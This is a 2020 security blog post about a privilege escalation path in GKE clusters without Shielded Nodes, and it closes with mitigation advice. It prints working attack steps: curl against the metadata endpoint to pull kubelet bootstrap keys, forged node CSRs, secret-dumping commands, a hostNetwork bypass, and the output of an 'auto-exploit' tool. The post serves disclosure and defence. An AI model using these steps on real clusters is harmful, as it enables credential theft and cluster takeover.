...

Why You Should Enable GKE Shielded Nodes Today

25 August 2020

When Shielded GKE Nodes is enabled, the GKE control plane cryptographically verifies that every node in the cluster is a virtual machine running in a managed instance group in Google’s data center and that each kubelet is only requesting a certificate for its own node. But Shielded GKE Nodes addresses a much bigger problem.

And I quote

From the GKE documentation:

“Without Shielded GKE Nodes an attacker can exploit a vulnerability in a Pod to exfiltrate bootstrap credentials and impersonate nodes in your cluster, giving the attackers access to cluster secrets.”

The way this is worded is technically correct, but it identifies only one of several possible preconditions for this attack to be successful: a compromised Pod. If we dig a little deeper, we can see that the other preconditions are commonly available in most environments.

Kube-Env

As GKE is a Google Cloud service that runs “on top” of Google Compute Engine, GKE Shielded Nodes leverages the underlying capabilities of GCE Shielded VMs. GKE also uses a GCE feature called Custom Instance Metadata to host small amounts of data that the virtual machine can retrieve via a web request to a URL reachable only from inside that GCE virtual machine. Specifically, it holds the data needed to “bootstrap” GCE nodes so they join the GKE cluster and show up as ready to handle GKE workloads. The custom attribute named kube-env is what holds the initial set of credentials used for this purpose.
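For reference, this metadata is served over the standard GCE metadata endpoint, so any process on the VM can query it. A minimal sketch from a shell on a node:

    # List the custom metadata attribute keys visible to this VM;
    # on a GKE node, the listing includes kube-env among others
    curl -s -H "Metadata-Flavor: Google" \
      "http://metadata.google.internal/computeMetadata/v1/instance/attributes/"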

The Bootstrapping Process

When a GKE node (a GCE virtual machine with a specific configuration) first starts, the initial configuration scripts do several things to prepare the node to be a GKE worker node, and they use the custom metadata kube-env file to obtain a list of important settings. Inside the kube-env file are a CA certificate and a client certificate/private key pair. This keypair is used by the kubelet to “bootstrap” itself. That is, the kubelet generates a new keypair of its own and uses the keypair from kube-env to submit a CertificateSigningRequest to the API server. If the CSR matches the proper structure and naming conventions, the GKE control plane auto-approves it, and the kubelet can fetch the signed certificate and use it with its new private key to join the cluster.
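To make that flow concrete, here is a rough sketch of what the bootstrap exchange can look like with openssl and kubectl (this mirrors the proof-of-concept discussed later, not GKE’s own bootstrap scripts). The API server address, node hostname, and file names are placeholders, and the CSR API version shown (certificates.k8s.io/v1beta1) reflects the Kubernetes versions current at the time of writing:

    # Placeholders: API server address and node hostname
    APISERVER="https://203.0.113.10"
    NODE="gke-example-node"

    # 1) Generate a fresh keypair for the kubelet's client certificate
    openssl ecparam -name prime256v1 -genkey -noout -out kubelet.key

    # 2) Create a CSR that follows the node client certificate convention:
    #    O=system:nodes, CN=system:node:<hostname>
    openssl req -new -key kubelet.key \
      -subj "/O=system:nodes/CN=system:node:${NODE}" \
      -out kubelet.csr

    # 3) Submit the CSR while authenticated with the bootstrap keypair from kube-env;
    #    the GKE control plane auto-approves CSRs that match this structure
    cat <<EOF | kubectl --server="${APISERVER}" --certificate-authority=ca.crt \
        --client-certificate=bootstrap.crt --client-key=bootstrap.key create -f -
    apiVersion: certificates.k8s.io/v1beta1
    kind: CertificateSigningRequest
    metadata:
      name: node-csr-${NODE}
    spec:
      request: $(base64 -w0 kubelet.csr)
      usages: ["digital signature", "key encipherment", "client auth"]
    EOF

    # 4) Once approved, download the signed certificate for the new key
    kubectl --server="${APISERVER}" --certificate-authority=ca.crt \
      --client-certificate=bootstrap.crt --client-key=bootstrap.key \
      get csr "node-csr-${NODE}" -o jsonpath='{.status.certificate}' | base64 -d > kubelet.crt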

Where This Goes Sideways

  1. The default configuration of GKE clusters provides no method for blocking access to the GCE Instance Metadata. In most GKE clusters, any Pod running on a node has direct access to this metadata because, from the perspective of the Metadata API, it’s just another process running on the node.

    root@evil-pod:/# curl -s -H "Metadata-Flavor: Google" 169.254.169.254/computeMetadata/v1/instance/attributes/kube-env | grep ^KUBELET
    KUBELET_CERT: LS0tLS...snip...
    KUBELET_KEY: LS0tLS..snip...
    
  2. The GKE control plane in non-Shielded Node clusters does not validate that the hostname in the CSR matches the hostname of the node requesting the keypair. In other words, if an attacker can access one node’s kubelet bootstrapping keypair, they can create valid keypairs for every node in the cluster, provided they know the hostnames.

  3. Finally, the kubelet is responsible for running workloads, so to perform its intended task it needs the ability to fetch the secrets attached to any Pod currently scheduled on its node.

If one could generate valid kubelet keypairs for all nodes in the cluster, they could iterate through each node and grab all the cluster secrets attached to the Pods running on it. In practical terms, that’s close to the same access provided by kubectl get secrets --all-namespaces. In nearly all clusters, at least one Kubernetes Service Account is bound to a privileged RBAC ClusterRole like cluster-admin.
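For illustration, with a forged certificate and key for a given node (plus the cluster CA and the API server address from kube-env), gathering each node’s secrets boils down to something like the following sketch. The node name, file names, and API server address are placeholders; the secret name is taken from the sample run later in this post:

    # Placeholders
    APISERVER="https://203.0.113.10"
    NODE="gke-example-node"

    # Authenticate as the node and list the Pods scheduled on it
    kubectl --server="${APISERVER}" --certificate-authority=ca.crt \
      --client-certificate="${NODE}.crt" --client-key="${NODE}.key" \
      get pods --all-namespaces --field-selector "spec.nodeName=${NODE}" -o json

    # ...then fetch each secret referenced by those Pods, for example:
    kubectl --server="${APISERVER}" --certificate-authority=ca.crt \
      --client-certificate="${NODE}.crt" --client-key="${NODE}.key" \
      get secret -n kube-system metadata-agent-token-2x6tk -o json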

In default GKE clusters, this means that any Pod has a direct path to escalate to cluster-admin without requiring authentication. As cluster-admin, the user controls all data and applications running on the GKE workers as well as the union of all permissions associated with credentials attached to Pods running in the cluster. At best, it’s free compute. At worst, it’s a launch point for full GCP account takeover.

How Long Has This Been Known?

In November of 2018, this attack path was privately disclosed to the Google Vulnerability Reward Program by Darkbit’s own Brad Geesaman. That same week (coincidentally), the team at 4Armed publicly wrote up their findings on this issue. The Google VRP Team did not award a bounty as it was already identified internally as a known issue.

Kube-env-stealer

At the time of initial disclosure, a proof-of-concept utility called kube-env-stealer (https://github.com/bgeesaman/kube-env-stealer) was created, but it was not made public for six months so that its release would coincide with the release of the GKE Metadata Concealment Proxy.

The kube-env-stealer is a set of scripts and a Pod deployment that automates the following process:

  1. Creates a Pod using an nginx:latest image inside the current GKE cluster
  2. Copies a script to the new Pod
  3. Runs the script and wraps the extracted cluster secrets and data into a single tarball
  4. Copies the tarball to the local directory
  5. Deletes the Pod

A sample run against a test cluster looks like this:

$ ./auto-exploit.sh
deployment.apps/evil-pod created
deployment.extensions/evil-pod condition met
[[ Checking if curl exists ]]
[[ Checking if awk exists ]]
[[ Checking if sed exists ]]
[[ Checking if grep exists ]]
[[ Checking if base64 exists ]]
[[ Checking if openssl exists ]]
[[ Obtain kube-env ]]
[[ Source kube-env ]]
[[ Get bootstrap certificate data ]]
[[ Get kubectl binary ]]
[[ Obtain the Hostname ]]
[[ Create nodes/gke-notshielded-default-pool-144c7d3a-4pql/openssl.cnf ]]
[[ Generate EC kubelet keypair for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Generate CSR for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Generate CSR YAML for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Submit CSR and Generate Certificate for gke-notshielded-default-pool-144c7d3a-4pql ]]
certificatesigningrequest.certificates.k8s.io/node-csr-gke-notshielded-default-pool-144c7d3a-4pql-75BB created
[[ Sleep 2 while being approved ]]
[[ Download approved Cert for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Dumping secrets mounted to gke-notshielded-default-pool-144c7d3a-4pql ]]
Exporting secrets/default-default-token-cfpft.json
Exporting secrets/kube-system-default-token-fhlb2.json
Exporting secrets/kube-system-event-exporter-sa-token-zml6x.json
Exporting secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json
Exporting secrets/kube-system-fluentd-gcp-token-pwmsz.json
Exporting secrets/kube-system-heapster-token-dphxp.json
Exporting secrets/kube-system-kube-dns-autoscaler-token-fltl5.json
Exporting secrets/kube-system-kube-dns-token-wphxh.json
Exporting secrets/kube-system-metadata-agent-token-2x6tk.json
Exporting secrets/kube-system-metrics-server-token-w4wbh.json
Exporting secrets/kube-system-prometheus-to-sd-token-n7tlv.json
[[ Download a full pod listing ]]
[[ Get node names ]]
[[ Iterate through all other node names ]]
[[ Extracting namespace, podname, and secret listing ]]
drwxr-xr-x  0 root   root        0 Aug 25 12:38 dumps/
-rw-r--r--  0 root   root   126965 Aug 25 12:38 dumps/allpods.json
-rw-r--r--  0 root   root      847 Aug 25 12:38 dumps/ns-pod-secret-listing.txt
drwxr-xr-x  0 root   root        0 Aug 25 12:38 secrets/
-rw-r--r--  0 root   root     3558 Aug 25 12:38 secrets/kube-system-event-exporter-sa-token-zml6x.json
-rw-r--r--  0 root   root     3476 Aug 25 12:38 secrets/kube-system-default-token-fhlb2.json
-rw-r--r--  0 root   root     3483 Aug 25 12:38 secrets/kube-system-heapster-token-dphxp.json
-rw-r--r--  0 root   root     3551 Aug 25 12:38 secrets/kube-system-prometheus-to-sd-token-n7tlv.json
-rw-r--r--  0 root   root     3508 Aug 25 12:38 secrets/kube-system-fluentd-gcp-token-pwmsz.json
-rw-r--r--  0 root   root     3565 Aug 25 12:38 secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json
-rw-r--r--  0 root   root     3483 Aug 25 12:38 secrets/kube-system-kube-dns-token-wphxh.json
-rw-r--r--  0 root   root     3533 Aug 25 12:38 secrets/kube-system-metadata-agent-token-2x6tk.json
-rw-r--r--  0 root   root     3576 Aug 25 12:38 secrets/kube-system-kube-dns-autoscaler-token-fltl5.json
-rw-r--r--  0 root   root     3448 Aug 25 12:38 secrets/default-default-token-cfpft.json
-rw-r--r--  0 root   root     3533 Aug 25 12:38 secrets/kube-system-metrics-server-token-w4wbh.json
deployment.apps "evil-pod" deleted

The entire process takes roughly 20 to 60 seconds depending on the number of nodes in the cluster, and the only required permission is the ability to create Pods in any one namespace.
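A quick way to check whether a given set of credentials clears that bar (using the default namespace as an example):

    # Prints "yes" if the current credentials are allowed to create Pods
    kubectl auth can-i create pods -n default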

Partial Solutions

At the time, the GKE Metadata Concealment Proxy was the stop-gap fix; its functionality was later wrapped into Workload Identity. Essentially, it blocked Pods from reaching the sensitive Metadata API endpoints like kube-env.
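For reference, both mitigations are enabled with gcloud flags along these lines (cluster, node pool, and project names are placeholders, and the flag names reflect the gcloud release at the time of writing):

    # Metadata concealment on a new node pool (the original stop-gap)
    gcloud beta container node-pools create concealed-pool \
      --cluster my-cluster \
      --workload-metadata-from-node=SECURE

    # Workload Identity on an existing cluster and node pool
    gcloud container clusters update my-cluster \
      --workload-pool=my-project.svc.id.goog
    gcloud container node-pools update my-pool \
      --cluster my-cluster \
      --workload-metadata=GKE_METADATA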

However, if no Admission Control is in place, a Pod that specifies hostNetwork: true can still access the Instance Metadata API as before and bypass both of these solutions.
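For example, a manifest along these lines (Pod name and image are hypothetical) puts a Pod directly in the node’s network namespace, where the metadata endpoint answers as before:

    # Hypothetical Pod that shares the node's network namespace
    cat <<'EOF' | kubectl apply -f -
    apiVersion: v1
    kind: Pod
    metadata:
      name: hostnet-pod
    spec:
      hostNetwork: true
      containers:
      - name: shell
        image: alpine:3.12
        command: ["sleep", "3600"]
    EOF

    # From inside that Pod, kube-env is still reachable
    kubectl exec hostnet-pod -- wget -qO- --header "Metadata-Flavor: Google" \
      http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env

An admission policy that rejects hostNetwork Pods (for example, a PodSecurityPolicy) closes this particular gap.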

As mentioned at the beginning of this post, a compromised Pod is only one way to gain access to the GCE Instance Metadata. Certain IAM roles grant direct access to the GCE Instance Metadata attributes without requiring a foothold inside the cluster. Namely, any role that grants compute.instances.get in the same project as the cluster can read kube-env directly from the GCP API.

$ gcloud compute instances describe gke-notshielded-default-pool-144c7d3a-4pql
..snip..
id: '4278918789669244206'
kind: compute#instance
..snip..
metadata:
  items:
    ..snip..
  - key: kube-env
    value: |
      ..snip..
      CA_CERT: LS0tLS1..snip..
      KUBELET_CERT: LS0tLS1..snip..
      KUBELET_KEY: LS0tLS1..snip..
      ..snip..
  kind: compute#metadata
name: gke-notshielded-default-pool-144c7d3a-4pql
..snip..
status: RUNNING
zone: https://www.googleapis.com/compute/v1/projects/gke-c2/zones/us-central1-c

If a malicious user compromises other valid credentials holding this permission, and the GKE API server is network-accessible or “public” (also a default configuration), they can perform the same attack without ever needing to be inside the cluster. This variant is handled by a slightly modified script that is also available in the kube-env-stealer repository.
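That script aside, the first step of this variant is simply pulling the credentials out of the instance description; a minimal sketch with gcloud and jq, using the instance name and zone from the example above:

    # Extract the kube-env attribute for a node from outside the cluster
    gcloud compute instances describe gke-notshielded-default-pool-144c7d3a-4pql \
      --zone us-central1-c --format=json \
      | jq -r '.metadata.items[] | select(.key == "kube-env") | .value' \
      | grep -E '^(CA_CERT|KUBELET_CERT|KUBELET_KEY):'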

The More Complete Solution

Enter GKE Shielded Nodes. Aside from all of its validation benefits, the key change is that kube-env no longer holds the sensitive kubelet bootstrapping credentials. Those are now distributed via the node’s vTPM and are only accessible to processes on the node running with root permissions.

Per the GKE Shielded Nodes documentation, Shielded Nodes will be the default starting in GKE 1.18. As of this writing, the latest available version in the rapid channel is 1.17, so it is not the default just yet. However, you can enable GKE Shielded Nodes on any cluster running GKE 1.13.6-gke.0 or later, either as an upgrade operation on an existing cluster or when creating a new one.
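Enabling it is a single flag at cluster creation or update time (the cluster name is a placeholder):

    # New cluster with Shielded Nodes
    gcloud container clusters create my-cluster --enable-shielded-nodes

    # Enable Shielded Nodes on an existing cluster
    gcloud container clusters update my-cluster --enable-shielded-nodes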

Conclusion

The GKE platform has recently closed a serious privilege escalation path present in most default GKE clusters, and GKE customers should strongly consider enabling GKE Shielded Nodes to improve the defense-in-depth posture of their GKE environments.